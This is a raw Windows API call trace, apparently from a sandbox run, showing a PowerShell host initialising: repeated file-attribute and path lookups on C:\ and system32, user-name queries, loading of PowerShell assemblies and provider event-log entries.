	[0708.677] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0708.677] SetErrorMode (uMode=0x1) returned 0x1
	[0708.677] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d0b0 | out: lpFileInformation=0x26d0b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0708.677] SetErrorMode (uMode=0x1) returned 0x1
	[0708.677] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0708.677] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0708.677] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0708.678] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cc30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0708.678] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0708.679] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0708.679] SetErrorMode (uMode=0x1) returned 0x1
	[0708.679] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cee0 | out: lpFileInformation=0x26cee0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0708.679] SetErrorMode (uMode=0x1) returned 0x1
	[0708.679] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0708.679] SetErrorMode (uMode=0x1) returned 0x1
	[0708.679] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cee0 | out: lpFileInformation=0x26cee0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0708.679] SetErrorMode (uMode=0x1) returned 0x1
	[0708.683] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0708.683] SetErrorMode (uMode=0x1) returned 0x1
	[0708.683] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cf80 | out: lpFileInformation=0x26cf80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0708.683] SetErrorMode (uMode=0x1) returned 0x1
	[0708.684] CoTaskMemAlloc (cb=0x804) returned 0x1b88ccb0
	[0708.684] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b88ccb0, nSize=0x26d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d388) returned 0x1
	[0708.684] CoTaskMemFree (pv=0x1b88ccb0) 
	[0708.684] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0708.684] GetUserNameW (in: lpBuffer=0xf4470, pcbBuffer=0x26d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d3c8) returned 1
	[0708.684] CoTaskMemFree (pv=0xf4470) 
	[0708.685] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ee72d0*="FileSystem", lpRawData=0x2ee7060) returned 1
	[0708.686] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0708.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0708.686] CoTaskMemFree (pv=0x139a40) 
	[0708.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0708.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0708.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0708.688] CoTaskMemAlloc (cb=0x804) returned 0x1b88ccb0
	[0708.688] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b88ccb0, nSize=0x26d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d388) returned 0x1
	[0711.515] CoTaskMemFree (pv=0x1b88ccb0) 
	[0711.515] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0711.515] GetUserNameW (in: lpBuffer=0xf4470, pcbBuffer=0x26d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d3c8) returned 1
	[0711.516] CoTaskMemFree (pv=0xf4470) 
	[0711.516] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eecb10*="Function", lpRawData=0x2eec8a0) returned 1
	[0714.412] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0714.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0714.413] CoTaskMemFree (pv=0x139a40) 
	[0714.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0714.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0714.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0714.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0716.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0716.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0716.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0716.876] CoTaskMemAlloc (cb=0x804) returned 0x1b88ccb0
	[0716.876] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b88ccb0, nSize=0x26d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d388) returned 0x1
	[0719.036] CoTaskMemFree (pv=0x1b88ccb0) 
	[0719.036] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0719.036] GetUserNameW (in: lpBuffer=0xf4470, pcbBuffer=0x26d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d3c8) returned 1
	[0719.037] CoTaskMemFree (pv=0xf4470) 
	[0719.037] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f0f338*="Registry", lpRawData=0x2f0f0c8) returned 1
	[0719.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0719.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0719.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0719.199] CoTaskMemAlloc (cb=0x804) returned 0x1b88ccb0
	[0719.199] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b88ccb0, nSize=0x26d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d388) returned 0x1
	[0719.200] CoTaskMemFree (pv=0x1b88ccb0) 
	[0719.200] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0719.200] GetUserNameW (in: lpBuffer=0xf4470, pcbBuffer=0x26d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d3c8) returned 1
	[0719.200] CoTaskMemFree (pv=0xf4470) 
	[0719.201] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f14750*="Variable", lpRawData=0x2f144e0) returned 1
	[0719.203] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0719.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0719.203] CoTaskMemFree (pv=0x139a40) 
	[0719.206] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0719.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0719.206] CoTaskMemFree (pv=0x139a40) 
	[0719.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0719.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0719.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0719.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0720.804] CoTaskMemAlloc (cb=0x804) returned 0x1b88ccb0
	[0720.804] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b88ccb0, nSize=0x26d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d388) returned 0x1
	[0722.435] CoTaskMemFree (pv=0x1b88ccb0) 
	[0722.435] CoTaskMemAlloc (cb=0x204) returned 0xf4470
	[0722.435] GetUserNameW (in: lpBuffer=0xf4470, pcbBuffer=0x26d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d3c8) returned 1
	[0722.436] CoTaskMemFree (pv=0xf4470) 
	[0722.436] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f285a8*="Certificate", lpRawData=0x2f28338) returned 1
	[0723.885] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0723.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.885] CoTaskMemFree (pv=0x139a40) 
	[0723.889] GetLogicalDrives () returned 0x4
	[0723.889] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26d010, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0723.889] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0723.890] CoTaskMemAlloc (cb=0x20e) returned 0x146480
	[0723.890] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x146480 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0723.890] CoTaskMemFree (pv=0x146480) 
	[0723.892] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0723.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.892] CoTaskMemFree (pv=0x139a40) 
	[0723.892] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0723.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.892] CoTaskMemFree (pv=0x139a40) 
	[0723.911] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0723.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.911] CoTaskMemFree (pv=0x139a40) 
	[0723.912] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0723.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.913] CoTaskMemFree (pv=0x139a40) 
	[0723.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0723.913] SetErrorMode (uMode=0x1) returned 0x1
	[0723.913] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cfd0 | out: lpFileInformation=0x26cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0723.913] SetErrorMode (uMode=0x1) returned 0x1
	[0723.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0723.914] SetErrorMode (uMode=0x1) returned 0x1
	[0723.914] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cfd0 | out: lpFileInformation=0x26cfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0723.914] SetErrorMode (uMode=0x1) returned 0x1
	[0723.914] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0723.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.914] CoTaskMemFree (pv=0x139a40) 
	[0723.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0723.917] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0723.917] SetErrorMode (uMode=0x1) returned 0x1
	[0723.917] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0723.918] SetErrorMode (uMode=0x1) returned 0x1
	[0723.918] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0723.918] SetErrorMode (uMode=0x1) returned 0x1
	[0723.918] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0723.918] SetErrorMode (uMode=0x1) returned 0x1
	[0723.918] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0723.918] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0723.918] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0723.918] SetErrorMode (uMode=0x1) returned 0x1
	[0723.919] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0723.919] SetErrorMode (uMode=0x1) returned 0x1
	[0723.919] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0723.919] SetErrorMode (uMode=0x1) returned 0x1
	[0723.919] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0723.919] SetErrorMode (uMode=0x1) returned 0x1
	[0723.919] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0723.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0723.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0723.920] SetErrorMode (uMode=0x1) returned 0x1
	[0723.920] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0723.920] SetErrorMode (uMode=0x1) returned 0x1
	[0723.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0723.920] SetErrorMode (uMode=0x1) returned 0x1
	[0723.920] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26cf90 | out: lpFileInformation=0x26cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0723.920] SetErrorMode (uMode=0x1) returned 0x1
	[0723.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0723.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0725.496] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0725.497] SetErrorMode (uMode=0x1) returned 0x1
